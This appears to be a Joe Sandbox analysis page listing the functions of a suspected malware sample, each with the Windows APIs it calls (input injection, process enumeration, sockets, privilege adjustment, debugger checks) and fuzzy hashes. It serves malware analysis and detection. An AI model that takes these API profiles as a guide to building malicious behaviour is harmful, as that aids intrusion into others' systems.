Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: bbe80efea17fbf0fbc6bb42756f05901a670b9b3a31076152137757bb55c23c2
Instruction ID: 5766b7b8f55e185325d770d0756ba79b2c9bba50ec100200c57fc73ef7d1915b
Opcode Fuzzy Hash: bbe80efea17fbf0fbc6bb42756f05901a670b9b3a31076152137757bb55c23c2
Instruction Fuzzy Hash: C2D15871508202AFD314EF24C8959ABBBE8FFD8304F40496DF5959B291EB31ED46CB92

Function 005922DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 005922E8

Part of subcall function 0058E4EC: GetWindowRect.USER32(?,?), ref: 0058E504

GetDesktopWindow.USER32 ref: 00592312
GetWindowRect.USER32(00000000), ref: 00592319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00592355
GetCursorPos.USER32(?), ref: 00592381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 005923DF

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 9d1260637b44cc3da4d6eabc3b645c9e0f00466f70fff01a2ab47522f6a789d8
Instruction ID: ab8ac46f56834affceed31e8a00d84c1667fcb0944549a94fd558a1e514ce4f2
Opcode Fuzzy Hash: 9d1260637b44cc3da4d6eabc3b645c9e0f00466f70fff01a2ab47522f6a789d8
Instruction Fuzzy Hash: A231DE72505316AFCB20DF14D849B5BBBE9FF89310F000919F98997191DB34EA08CB92

Function 00589B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00589B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00589C8B

Part of subcall function 00583874: GetInputState.USER32 ref: 005838CB
Part of subcall function 00583874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00583966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00589BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00589C75

Strings

*.*, xrefs: 00589B5D

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: cd9f255d80474b86fe1570301180a13b01a275f20cd8a6e1a37f75b96a972c19
Instruction ID: 07fbb771b0ffd4c3c3a9af82df8d12deabb020f8fa5dcd6892961e74eb99cc67
Opcode Fuzzy Hash: cd9f255d80474b86fe1570301180a13b01a275f20cd8a6e1a37f75b96a972c19
Instruction Fuzzy Hash: 9341827190420AAFDF15EFA4C899AEEBFB4FF45310F244456E815B2191EB319E84CF60

Function 0052997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00529A4E
GetSysColor.USER32(0000000F), ref: 00529B23
SetBkColor.GDI32(?,00000000), ref: 00529B36

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: cfc1820b6075d2964fb69c04e2e07312443c4ce03a80680f2c5169791115175b
Instruction ID: ac4656bfb01e6cd28b69ffb343ad604e2269c08c0de2d28f6bac8cdb54a34805
Opcode Fuzzy Hash: cfc1820b6075d2964fb69c04e2e07312443c4ce03a80680f2c5169791115175b
Instruction Fuzzy Hash: 5AA1F770108668AEE728AA2CAC9CE7F2E9DFF8B354F140609F502D77D1CB259D41D276

Function 00591806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0059304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0059307A
Part of subcall function 0059304E: _wcslen.LIBCMT ref: 0059309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0059185D
WSAGetLastError.WSOCK32 ref: 00591884
bind.WSOCK32(00000000,?,00000010), ref: 005918DB
WSAGetLastError.WSOCK32 ref: 005918E6
closesocket.WSOCK32(00000000), ref: 00591915

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: d168676fb91f24ff3471d8d8bbbccabc734be448441b8c89ff6f3f23ac591d02
Instruction ID: 05880092055b06d605d49a7d571dcc5d2f2ce00b9ed365500872198dffedfaf6
Opcode Fuzzy Hash: d168676fb91f24ff3471d8d8bbbccabc734be448441b8c89ff6f3f23ac591d02
Instruction Fuzzy Hash: 9451B275A002119FEB10AF24C88AF6A7FE5BF85718F048458F9165F3C3D771AD418BA1

Function 005A1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 005A1CC0
IsWindowEnabled.USER32 ref: 005A1CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 005A1CDB
IsIconic.USER32 ref: 005A1CE9
IsZoomed.USER32 ref: 005A1CF7

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 893a00421e68434c2c6070087901979c52133c2fde416e960db13dacc42aed01
Instruction ID: f34e508edbbdb1eaaefda7c8993fd17b0bf63b156bacadfb7320719a1a8a5ba5
Opcode Fuzzy Hash: 893a00421e68434c2c6070087901979c52133c2fde416e960db13dacc42aed01
Instruction Fuzzy Hash: 1C218331740A115FE7208F2AC854B6E7FE5FF96325F198068E8468B351CB71DC46CB98

Function 00518060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

ERCP, xrefs: 0051813C
VUUU, xrefs: 00555DF0
VUUU, xrefs: 005183E8
VUUU, xrefs: 0051843C
VUUU, xrefs: 005183FA

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 3d285605b9d2a835d8779eebecf449feb85882a3e5919315a1bb755c2c2b8fea
Instruction ID: 8874fc9844aae64ebedaa98193ed84187a1ffb264a53b44f0b5359c1225db84e
Opcode Fuzzy Hash: 3d285605b9d2a835d8779eebecf449feb85882a3e5919315a1bb755c2c2b8fea
Instruction Fuzzy Hash: F8A26A74A0061ACBEF348F58C8A47FDBBB1BB54311F6485AAD815A7281EB709D85CB90

Function 00578298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 005782AA

Strings

|, xrefs: 005782DA
(, xrefs: 005782F0
tb], xrefs: 005784F4

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: lstrlen
String ID: ($tb]$|
API String ID: 1659193697-2890004336
Opcode ID: d2dccfe8ccd06187e64653e1d08d85b8d376eb5b0dad65fc02501434a6169362
Instruction ID: 5acc7c38a10b7b2a8190d46f6875fdd5a946307441f06f886ed1275ad3df5567
Opcode Fuzzy Hash: d2dccfe8ccd06187e64653e1d08d85b8d376eb5b0dad65fc02501434a6169362
Instruction Fuzzy Hash: B2323574A006059FCB28CF59D485A6ABBF0FF48710B15C96EE49ADB7A1EB70E941CB40

Function 0059A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0059A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0059A6BA

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

Process32NextW.KERNEL32(00000000,?), ref: 0059A79C
CloseHandle.KERNEL32(00000000), ref: 0059A7AB

Part of subcall function 0052CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00553303,?), ref: 0052CE8A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: e9966aac6c9f087808cd4358b6397ecf99372f15f512eabf53461f3c44fbf9e4
Instruction ID: 0f7578123f3f8661b9f3d33fd859809fff861ad850c5157a9e63722a22c109ae
Opcode Fuzzy Hash: e9966aac6c9f087808cd4358b6397ecf99372f15f512eabf53461f3c44fbf9e4
Instruction Fuzzy Hash: 8E512B71508311AFD710EF24D88AAABBBE8FFC9754F00491DF59597291EB30E944CBA2

Function 0057AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0057AAAC
SetKeyboardState.USER32(00000080), ref: 0057AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0057AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0057AB88

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: a7b9e625ec7f833e5aca24eb455cca2744b0684910cfdf10f673c823141e59c6
Instruction ID: 203444b62a6dd7f5777a18ed7777f30a5a573b2bb8ea35d84a609d72279fbf84
Opcode Fuzzy Hash: a7b9e625ec7f833e5aca24eb455cca2744b0684910cfdf10f673c823141e59c6
Instruction Fuzzy Hash: A8311530A40208AEFB25CA64E805BFE7FAABBC5310F04C21AF58D561D0D7748985E7A2

Function 0058CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0058CE89
GetLastError.KERNEL32(?,00000000), ref: 0058CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0058CEFE

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: e9c1c0924759cbf3368b07cbf4399c80d699fd6c4b22a6eae431f719e46d389b
Instruction ID: 717ba3dc2f06fa270d90f1c0f6ecd6b7908c38c7464b4538ed53b1bc01d854b1
Opcode Fuzzy Hash: e9c1c0924759cbf3368b07cbf4399c80d699fd6c4b22a6eae431f719e46d389b
Instruction Fuzzy Hash: 7521B0715003059BE731EF65D949BA67FFCFB51314F10481EEA46E2151E774ED089B60

Function 00542622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0054271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00542724
UnhandledExceptionFilter.KERNEL32(?), ref: 00542731

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: afa0bad793a59e7ef57cef759c7177a981d01b9904b6c01d6fc933f25c2b7c4e
Instruction ID: a7e356534833ece82dee2b925e8f95037e498253b70cb1e6148de0dc3a26d460
Opcode Fuzzy Hash: afa0bad793a59e7ef57cef759c7177a981d01b9904b6c01d6fc933f25c2b7c4e
Instruction Fuzzy Hash: EA31C27490122DABCB21DF68DD887DCBBB8BF18310F5041EAE80CA6260E7309F859F44

Function 005851CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 005851DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00585238
SetErrorMode.KERNEL32(00000000), ref: 005852A1

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 302896f6692914c909f31026dc2ae98f794663d7dc9fff567ab0d280a3bf993f
Instruction ID: ccff98b3a51e8eda4305d98c6f91e0c6c59991862f3bc10c31d27e16c8ec55a6
Opcode Fuzzy Hash: 302896f6692914c909f31026dc2ae98f794663d7dc9fff567ab0d280a3bf993f
Instruction Fuzzy Hash: EC312C75A00619DFDB00EF54D888EADBFB5FF49314F048099E805AB362DB31E85ACB90

Function 005716C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0052FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00530668
Part of subcall function 0052FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00530685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0057170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0057173A
GetLastError.KERNEL32 ref: 0057174A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 268f155e4c234fe2b6824220a25d3d7e0924c6bc417fc0e4814b7664d9f40f59
Instruction ID: de28525dfd52e3a4012d6f38bbe328d96869c7069b90e1cfbbb5f54c633fd75f
Opcode Fuzzy Hash: 268f155e4c234fe2b6824220a25d3d7e0924c6bc417fc0e4814b7664d9f40f59
Instruction Fuzzy Hash: 5911CEB2400305AFD718AF58EC8AD6ABBBDFF45714B20C52EE05A57281EB70BC419B24

Function 0057D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0057D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0057D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0057D650

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: c8c7cfe43975fe371337c872d3ecfa002b006c502362fbed1bf106f54566f85b
Instruction ID: 97260a61659f020e052c7f1a407080e120ad8ae6da29ee8d527df9d05606bc67
Opcode Fuzzy Hash: c8c7cfe43975fe371337c872d3ecfa002b006c502362fbed1bf106f54566f85b
Instruction Fuzzy Hash: C2115E75E05228BFDB108F95EC45FAFBFBCEB45B50F108156F908E7290D6704A059BA1

Function 00571663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0057168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 005716A1
FreeSid.ADVAPI32(?), ref: 005716B1

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 94809f7e001e4ed01662eaaf9c3d4e79071f6493883b96a9ddbf9ebd256bffaa
Instruction ID: 176b2a6727dfe6d7a91da12daf738ecc5d2fe21a0fde1488a30f27f53cf86fe0
Opcode Fuzzy Hash: 94809f7e001e4ed01662eaaf9c3d4e79071f6493883b96a9ddbf9ebd256bffaa
Instruction Fuzzy Hash: 89F0F47195030DFBDB00DFE49D89AAEBBBCFB08604F508565E501E2181E774AA489A54

Function 00534CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(005428E9,?,00534CBE,005428E9,005D88B8,0000000C,00534E15,005428E9,00000002,00000000,?,005428E9), ref: 00534D09
TerminateProcess.KERNEL32(00000000,?,00534CBE,005428E9,005D88B8,0000000C,00534E15,005428E9,00000002,00000000,?,005428E9), ref: 00534D10
ExitProcess.KERNEL32 ref: 00534D22

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 82bd4bc6b819be00dd79d5582f8343fdd539c6cf3c8a409646c44832efbf5928
Instruction ID: ecd0645cbbe328e136bc984cf64a200a30c7cdb28f7f02806e61409061b09998
Opcode Fuzzy Hash: 82bd4bc6b819be00dd79d5582f8343fdd539c6cf3c8a409646c44832efbf5928
Instruction Fuzzy Hash: 2FE0B631000149ABCF11AF54DD09A593F69FB92785F104814FC059A132CB35ED46DE80

Function 0054C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0054C36C

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 9fb364bc48fa507a1570f00e0967a39e6cdf612500d40f85a340487188a7fcc7
Instruction ID: fb6652b98a3781b2f5a12221a0e427bcc911ea91ff4d2165c1d4f8dfa6b6fc82
Opcode Fuzzy Hash: 9fb364bc48fa507a1570f00e0967a39e6cdf612500d40f85a340487188a7fcc7
Instruction Fuzzy Hash: 7E410376901219ABCB209EB9CC89EFB7FB8FBC4318F504669F905D7180E6709D818B50

Function 0056D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0056D28C
